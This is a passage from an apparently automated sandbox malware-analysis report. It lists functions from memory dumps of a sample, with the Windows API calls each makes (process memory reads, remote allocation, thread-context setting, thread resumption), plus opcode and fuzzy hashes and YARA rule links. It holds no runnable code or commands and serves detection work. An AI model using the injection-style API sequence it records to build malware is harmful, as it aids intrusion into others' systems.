                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 478edac7a19a7253a98cb7fad7a6c72611e4a6cccdf4bb4d0319d2aeadd7064e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F52138B19003098FDB10DFAAC485BEEBBF4FF88324F548429D559A7241DB78A945CFA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513A10B Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0513A196
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                  • Opcode ID: 3f41a8a1977f411ee14be7315c3bb18f4d3f9dbe2c68ad87755826bb6e5fd716
                                                                                                                                                                                                                  • Instruction ID: 40fe9511bc2c49b159f2de2f3c9ef5767ed53e73adad72ffb6ebb9773c116e2d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f41a8a1977f411ee14be7315c3bb18f4d3f9dbe2c68ad87755826bb6e5fd716
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1213AB18002499FDB10CF9AC845AEEBFF5FF48310F148429E954A3251D778A954DFA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B708 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0513B790
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                  • Opcode ID: 48ed1900a45e53ec03ed8748cbb13a09606469bf02d3a89ed1553d4125f71eda
                                                                                                                                                                                                                  • Instruction ID: 61fc92ba3398ac46ea93c7e53504dddf5b43ffcd1d9e00676572f93b09b74b4e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48ed1900a45e53ec03ed8748cbb13a09606469bf02d3a89ed1553d4125f71eda
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B42136B1C003499FDB10DFAAC885AEEBBF5FF48320F50842AE519A3240D7389905DBA5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513A110 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0513A196
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                  • Opcode ID: 751c0a13bd5f7eb0117353481e36b008b33c18224b8ebfef52b961af07768994
                                                                                                                                                                                                                  • Instruction ID: f67c2e4386788cf83f07859f11ad9965b03b610b31ec15dcad6154ca8dacfbd9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 751c0a13bd5f7eb0117353481e36b008b33c18224b8ebfef52b961af07768994
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 802149B18002499FDB10CF9AC885AEFBFF5FF48310F14842AE958A3251D778A954DFA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B710 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0513B790
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                  • Opcode ID: 16484170c65ff895407b48fefdb2b97005e2fc35eb76f9727c638f9ffec683b2
                                                                                                                                                                                                                  • Instruction ID: a2756dfe86fa18dd472e0c9d6fbb8cf5a9c7b5253b3a7448748b1bc38fefa511
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16484170c65ff895407b48fefdb2b97005e2fc35eb76f9727c638f9ffec683b2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F12139B1C003499FDB10DFAAC885ADEFBF5FF48320F508429E519A7240D7389945DBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513AF90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0513B00E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                  • Opcode ID: 3eabe3da1631240e1f2ded143d74364243a05dbddcba45ebfc4ecaf2506303fe
                                                                                                                                                                                                                  • Instruction ID: 811b67d176df41350336895b34ca809c0b24d9514f51f7ae7dd8a63d8f502e38
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eabe3da1631240e1f2ded143d74364243a05dbddcba45ebfc4ecaf2506303fe
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A2149B19003098FDB10DFAAC485BEEBBF4FF88324F548429D559A7240DB78A945CFA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B060 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0513B0D6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                  • Opcode ID: 66b0d65134f909636b187eca448a367bfc21fbc80faf41125a3869a8cbc1a7b8
                                                                                                                                                                                                                  • Instruction ID: 4d0e815b442fe8d940d242d1e60bb42df2f2303ac63c1944c09ecf24dce34f7b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66b0d65134f909636b187eca448a367bfc21fbc80faf41125a3869a8cbc1a7b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871159728002499FDB20DFAAC845BEFBFF5FF48320F24841AE519A7250D735A944CBA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B068 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0513B0D6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                  • Opcode ID: 2d9b944d8db22861ed7d7efec743f3c197d1954a50be16cf56928e475b3f1643
                                                                                                                                                                                                                  • Instruction ID: 82b6b8635a5407b62fedb97d30e5ad4f95ddbfa5e079c8a7101040e9c047c295
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d9b944d8db22861ed7d7efec743f3c197d1954a50be16cf56928e475b3f1643
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F01126719002499FCB10DFAAC845ADEBFF5EB88320F148419E519A7250CB75A944CBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513AED8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                  • Opcode ID: 17c0065656f5e1c4a6c9eb6974afc5a7c4c3326dd91e4c8e5d4df646a108a095
                                                                                                                                                                                                                  • Instruction ID: 9be09063dde5c1dd5ab12274fe53c870be9eb29f237cc15152550e1fc3497df9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17c0065656f5e1c4a6c9eb6974afc5a7c4c3326dd91e4c8e5d4df646a108a095
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E1146B19003888BDB10DFAAC84979EFFF8EF88324F248419D559B7240CB79A945CB94
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513AEE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                  • Opcode ID: 88f377502a7a5dfa3e50b34bbf7c4e9dd5f71ebb7b24034cef126c495e4ebcd9
                                                                                                                                                                                                                  • Instruction ID: 09b036266c9ce2dc598d1c565937c7a7be8fd825fc103ec9d36a3249e3e74bbc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88f377502a7a5dfa3e50b34bbf7c4e9dd5f71ebb7b24034cef126c495e4ebcd9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B1136B19003498FDB10DFAAC4497DEFBF9EF88324F248419D559B7240CB79A945CBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CEDD9 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq
                                                                                                                                                                                                                  • API String ID: 0-1167855494
                                                                                                                                                                                                                  • Opcode ID: 37893adba37b15ec602bd8420a760c165b67953451d5d80de421926dac4f66fc
                                                                                                                                                                                                                  • Instruction ID: 19560fa6749fffc7b3da1c7369a0033e83a2d667b8da0feda03110cd7dae13cd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37893adba37b15ec602bd8420a760c165b67953451d5d80de421926dac4f66fc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EA12134A10219CFDB04DFA8D894A9DBBB6FF89704F158169E906AB365DB30EC46CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE3114 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                  • Opcode ID: 4312e3669756510c48a8beb0318b129646184a27098afd944f2b8db335ec8d41
                                                                                                                                                                                                                  • Instruction ID: 3d7c5a362340036a101a23ca1480243df85e6e7ca91346effafff7b1ff76bdee
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4312e3669756510c48a8beb0318b129646184a27098afd944f2b8db335ec8d41
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91911674A00684DFDB44EF56D488BB9B7F6FB88310F2481A5E5069B7A8C774AC85CF60
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE2D7E Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                  • Opcode ID: 4cc2f1c9df185ce60d2953b3f7317cc2b3f03ad2dbdd3d907d11094668f36e22
                                                                                                                                                                                                                  • Instruction ID: 7995f8ae31bdd740128ebf7e8c0b99fff144a8312c6891e333d245787f23f8a7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cc2f1c9df185ce60d2953b3f7317cc2b3f03ad2dbdd3d907d11094668f36e22
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E712A74600584CFDB44EB66C888F69B7B6FF89310F258165E506DB3A5D734AC85CBA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEAE40 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: TJiq
                                                                                                                                                                                                                  • API String ID: 0-2333859515
                                                                                                                                                                                                                  • Opcode ID: 80b20c4537431f086e22b820d9011c5eba370f3c6f470dd7c597d5421535af2b
                                                                                                                                                                                                                  • Instruction ID: 75aa160fbecd2b84bdb0746b332131849fffa9669166b819f3505054680409df
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80b20c4537431f086e22b820d9011c5eba370f3c6f470dd7c597d5421535af2b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 065149747006159FCB14EF69C884A5EB7F2BF88B20F258699E516DB3E5CB31EC018B61
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEAE30 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: TJiq
                                                                                                                                                                                                                  • API String ID: 0-2333859515
                                                                                                                                                                                                                  • Opcode ID: 1f61e658a4b8349a10bc86e0a2e5076add2d7c9ab5bab33c86258eec14ab8ee2
                                                                                                                                                                                                                  • Instruction ID: 7103dfe2f73f5de05f616d4b2c83fe26edacdeeda9bbc90ade02d1ae9f26b1ae
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f61e658a4b8349a10bc86e0a2e5076add2d7c9ab5bab33c86258eec14ab8ee2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87419B707006429FDB14EF69C844B5EB7A2BF89720F254699E516DB3E5CB30EC018BA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C4C86 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: phq
                                                                                                                                                                                                                  • API String ID: 0-315977702
                                                                                                                                                                                                                  • Opcode ID: efe0b9c8f9d729757713c32d7bb9ad4ba7b16e0c146a94bd3f69ffa1d908a288
                                                                                                                                                                                                                  • Instruction ID: da20010f41c0fed3b48fd3edac2c73742dd4de2cd693246aa1c1d82887875dd9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efe0b9c8f9d729757713c32d7bb9ad4ba7b16e0c146a94bd3f69ffa1d908a288
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F41D776600110AFCB469F98C954D5A7FF6FF8D31471A8098E6099B272DB32DC21EB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C4C90 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: phq
                                                                                                                                                                                                                  • API String ID: 0-315977702
                                                                                                                                                                                                                  • Opcode ID: 354bae1703cf2dfb597c7615ba33adf5515772d8e3c92a2f13243fef25a089d2
                                                                                                                                                                                                                  • Instruction ID: 47b40186878c3788f449acf2f8379cd55a9779735a1f1fa13b9f618ed2d50b32
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 354bae1703cf2dfb597c7615ba33adf5515772d8e3c92a2f13243fef25a089d2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F41E676600100AFCB469F98C914D5ABFF7FF8C31471A8098E6099B272DA32DC21EB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C5C48 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq
                                                                                                                                                                                                                  • API String ID: 0-4060669308
                                                                                                                                                                                                                  • Opcode ID: ef3e595aa0ccbaa205ebcf481c7b5214bc41d80fe017e0602c43eb7baa4756d6
                                                                                                                                                                                                                  • Instruction ID: 5138be169d21ded70195adc76b1caa29659a811430bdcefce74f3166080230c1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef3e595aa0ccbaa205ebcf481c7b5214bc41d80fe017e0602c43eb7baa4756d6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B241D135B00206CFCB11DF28C48896AFBB1FF89724B558699D525AB392D330FC46CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C47C5 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: uq^u
                                                                                                                                                                                                                  • API String ID: 0-750876860
                                                                                                                                                                                                                  • Opcode ID: 2659eba547fdf7b5b62665e9fa676d85a866659e1b6c4205f13476b7cc2f5366
                                                                                                                                                                                                                  • Instruction ID: 8534e4cb4103dfe0e4dcea6644fc987a91cae056a0d2f0edd6fb464e94015a9f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2659eba547fdf7b5b62665e9fa676d85a866659e1b6c4205f13476b7cc2f5366
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78315B328143749ED712EB7CE8702EA3FE0EF52725F44089EC1889B142DA315849C7D6
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CDE58 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq
                                                                                                                                                                                                                  • API String ID: 0-1167855494
                                                                                                                                                                                                                  • Opcode ID: c077913e0e0780441ea1a3f8900e935d7d389106410a6e088afc9b6d26e59296
                                                                                                                                                                                                                  • Instruction ID: 7815d40c572eeb60de564d6eec70a49e781888c09fdb9549aa7638f7523dc39e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c077913e0e0780441ea1a3f8900e935d7d389106410a6e088afc9b6d26e59296
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831F7357001059FCF058FA4C8949A9BFBAFF88314F0541E8EA0A9B366DA31DC17CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C40E8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Tedq
                                                                                                                                                                                                                  • API String ID: 0-228892971
                                                                                                                                                                                                                  • Opcode ID: e220708be5c011561a9f230bdd5be97361c79879571d54dcf1e9e5d96afb0c84
                                                                                                                                                                                                                  • Instruction ID: 5136d02df1c31f3cc40986047086f48da55b4a90577d0314bfbda0f1c14bf947
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e220708be5c011561a9f230bdd5be97361c79879571d54dcf1e9e5d96afb0c84
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43315E71B001148FDB04EB6AC865BAEBBE7EFC8711F15806AE505DB3A5CE708C058B90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C3E80 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Tedq
                                                                                                                                                                                                                  • API String ID: 0-228892971
                                                                                                                                                                                                                  • Opcode ID: 401ba1f2176bc60cfed02a1194bc7a4f5a848dc9868bd8e561b76e922f64b2ae
